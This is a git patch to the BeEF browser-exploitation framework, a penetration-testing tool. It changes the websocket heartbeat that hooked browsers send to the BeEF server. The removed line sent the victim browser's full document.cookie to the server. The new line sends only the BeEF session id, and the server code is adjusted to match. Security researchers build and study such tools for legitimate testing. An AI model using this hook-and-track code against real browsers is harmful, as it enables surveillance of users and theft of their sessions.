From 2c19a3a8d8dde58fe14ca2406bbaba3d5b0beb9d Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 2 May 2012 14:01:04 +0300
Subject: [PATCH] Fixed issue when hooking a browser that contains other
 cookies than BEEFHOOK. now "alive" send back only the BeEF session value

---
 core/main/client/websocket.js                  | 5 +++--
 core/main/network_stack/websocket/websocket.rb | 8 ++++----
 2 files changed, 7 insertions(+), 6 deletions(-)

diff --git a/core/main/client/websocket.js b/core/main/client/websocket.js
index ffce2b03c..e91b3fe18 100644
--- a/core/main/client/websocket.js
+++ b/core/main/client/websocket.js
@@ -60,13 +60,14 @@ beef.websocket = {
         console.log("Sent [" + data + "]");
     },
 
+    //todo antisnatchor: we need to get only the BEEFHOOK cookie value, not every cookie.
+    //todo in this way it will be easier to parse it server side.
     alive: function (){
-        beef.websocket.send('{"alive":"'+document.cookie+'"}');
+        beef.websocket.send('{"alive":"'+beef.session.get_hook_session_id()+'"}');
         console.log("sent alive");
         setTimeout("beef.websocket.alive()", beef.websocket.alive_timer);
 
     }
-
 };
 
 beef.regCmp('beef.websocket');
\ No newline at end of file
diff --git a/core/main/network_stack/websocket/websocket.rb b/core/main/network_stack/websocket/websocket.rb
index 12459c5a2..73652303d 100644
--- a/core/main/network_stack/websocket/websocket.rb
+++ b/core/main/network_stack/websocket/websocket.rb
@@ -27,10 +27,10 @@ module BeEF
         MOUNTS = BeEF::Core::Server.instance.mounts
         @@activeSocket= Hash.new #empty at begin
         @@lastalive= Hash.new
+        @@config = BeEF::Core::Configuration.instance
         def initialize
-          config = BeEF::Core::Configuration.instance
-          port = config.get("beef.http.websocket.port")
-          secure = config.get("beef.http.websocket.secure")
+          port = @@config.get("beef.http.websocket.port")
+          secure = @@config.get("beef.http.websocket.secure")
           #todo antisnatchor: start websocket secure if beef.http.websocket.secure == true
           server = WebSocketServer.new :accepted_domains => "127.0.0.1",
                                        :port => port
@@ -54,7 +54,7 @@ module BeEF
                         print_debug("In activesocket we have #{@@activeSocket}")
                       elsif messageHash["alive"] != nil
                         #@todo browser could be not in bd so we have to add it
-                        hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => messageHash["alive"].gsub("BEEFHOOK=",""))
+                        hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => messageHash["alive"])
                         hooked_browser.lastseen = Time.new.to_i
                         hooked_browser.count!
                         hooked_browser.save